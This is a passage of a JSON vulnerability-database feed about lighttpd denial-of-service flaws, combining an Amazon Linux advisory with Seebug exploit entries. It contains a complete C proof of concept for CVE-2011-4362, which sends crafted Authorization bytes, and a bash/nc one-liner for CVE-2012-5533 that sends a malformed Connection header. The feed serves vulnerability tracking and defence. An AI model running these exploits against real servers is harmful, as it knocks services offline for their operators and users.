lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T16:45:00", "published": "2014-09-14T16:45:00", "id": "ALAS-2012-107", "href": "https://alas.aws.amazon.com/ALAS-2012-107.html", "title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:55:59", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30003", "id": "SSV:30003", "type": "seebug", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n \r\n \r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n \r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n \r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n \r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. 
| 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. 
| 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n \r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n \r\nHow to run this very primitive Proof of Concept?\r\n \r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n Usage: ./p_cve-2011-4362 <options>\r\n \r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n \r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... 
OK\r\n \r\n [+] Check the website!\r\n \r\n$\r\n \r\nLighttpd will log this situation probably in error-log file like this:\r\n \r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd ]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n \r\n--- CUT ---\r\n \r\nMaybe you can find vulnerable binary?\r\n \r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n \r\n \r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-30003", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T15:50:31", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-76695", "id": "SSV:76695", "title": "lighttpd 1.4.31 Denial of Service PoC", "type": "seebug", "sourceData": "\n #!/bin/bash\r\n# Exploit Title: simple lighttpd 1.4.31 DOS POC\r\n# Date: 11/21/2012\r\n# Exploit Author: t4c@ghcif.de\r\n# Vendor Homepage: http://www.lighttpd.net\r\n# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz \r\n# Version: 1.4.31\r\n# Tested on: Debian Linux, Gentoo Linux, Arch Linux\r\n# CVE: CVE-2012-5533\r\n\r\nif [ $# -lt 2 ]\r\nthen\r\n\techo "usage :$0 <Host/IP> <Port>"\r\nelse\r\n\techo -ne "GET / HTTP/1.1\\r\\nHost: pwn.ed\\r\\nConnection: TE,,Keep-Alive\\r\\n\\r\\n" | nc $1 $2\r\nfi\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-76695"}, {"lastseen": "2017-11-19T17:58:08", "bulletinFamily": "exploit", 
"description": "CVE(CAN) ID: CVE-2012-5533\r\n\r\nlighttpd\u662f\u4e00\u6b3e\u5f00\u6e90\u7684\u8f7b\u91cf\u7ea7Web\u670d\u52a1\u5668\u3002\r\n\r\nlighttpd 1.4.31\u5728\u5904\u7406\u67d0\u4e9bHTTP\u8bf7\u6c42\u5934\u65f6\uff0c"http_request_split_value()"\u51fd\u6570(src/request.c)\u5728\u5904\u7406\u7279\u5236\u7684"Connection"\u62a5\u5934\u57df\u65f6\u4f1a\u9677\u5165\u65e0\u9650\u5faa\u73af\u3002\u653b\u51fb\u8005\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u5bfc\u81f4Lighttpd\u62d2\u7edd\u670d\u52a1\u3002\n0\nlighttpd 1.4.31\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLighttpd\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://download.lighttpd.net/lighttpd/security/lighttpd-1.4.31_fix_connection_header_dos.patch", "modified": "2012-11-23T00:00:00", "published": "2012-11-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60476", "id": "SSV:60476", "title": "lighttpd\u7578\u5f62HTTP Connection\u57df\u5904\u7406\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:56:15", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2011-12-27T00:00:00", "published": "2011-12-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26120", "id": "SSV:26120", "type": "seebug", "title": "Lighttpd 1.4.30 / 1.5 Denial Of Service", "sourceData": "\n /*\r\n *Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit.\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] 
= {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * ...\r\n * int ch, ...;\r\n * size_t i;\r\n * ...\r\n * \r\n * ch = in[i];\r\n * ...\r\n * ch = base64_reverse_table[ch];\r\n * ...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). 
Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. 
| 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). 
Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\nchar header_port[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s:%d\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\t\\t[+] Preparing arguments... 
");\r\n while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf("Gethostbyname() field!\\n");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf("malloc() :(\\n");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf("OK\\n\\t\\t[+] Creating socket... ");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf("Socket() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Connecting to [%s]... ",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf("Connect() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Sending dirty packet... 
");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf("OK\\n\\n\\t\\t[+] Check the website!\\n\\n");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n",arg);\r\n printf("\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n");\r\n exit(0);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26120", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:02:45", "bulletinFamily": "exploit", "description": "CVE-2011-4362\r\n\r\nLighttpd\u662f\u4e00\u6b3e\u8f7b\u578b\u7684\u5f00\u653e\u6e90\u7801Web Server\u8f6f\u4ef6\u5305\u3002\r\n\r\nlighttpd\u5728\u8ba4\u8bc1\u6570\u636e\u7684\u89e3\u7801\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nhttp_auth.c\u4e2d\u7684\u4ee3\u7801\u5728base64\u89e3\u7801\u7528\u6237\u8f93\u5165\u7684\u8ba4\u8bc1\u6570\u636e\u65f6\u4f7f\u7528"const char *in"\u7c7b\u578b\uff0c\u5e76\u5c06\u6bcf\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3a"int ch"\u4f5c\u4e3a\u6620\u5c04\u8868\u7684\u7d22\u5f15\uff0c\u5927\u4e8e0x80\u7684\u5b57\u7b26\u5c31\u4f1a\u5bfc\u81f4\u8d1f\u7d22\u5f15\uff0c\u53ef\u80fd\u9020\u6210\u975e\u6cd5\u5185\u5b58\u8bbf\u95ee\u3002\r\n\r\nlighttpd <=1.4.29\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLightTPD\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.lighttpd.net/", "modified": "2011-12-01T00:00:00", "published": "2011-12-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-24275", "id": 
"SSV:24275", "title": "lighttpd mod_auth\u6a21\u5757base64 \u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n---\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-24275"}, {"lastseen": "2017-11-19T13:25:09", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72453", "id": "SSV:72453", "type": "seebug", "title": "lighttpd Denial of Service Vulnerability PoC", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. 
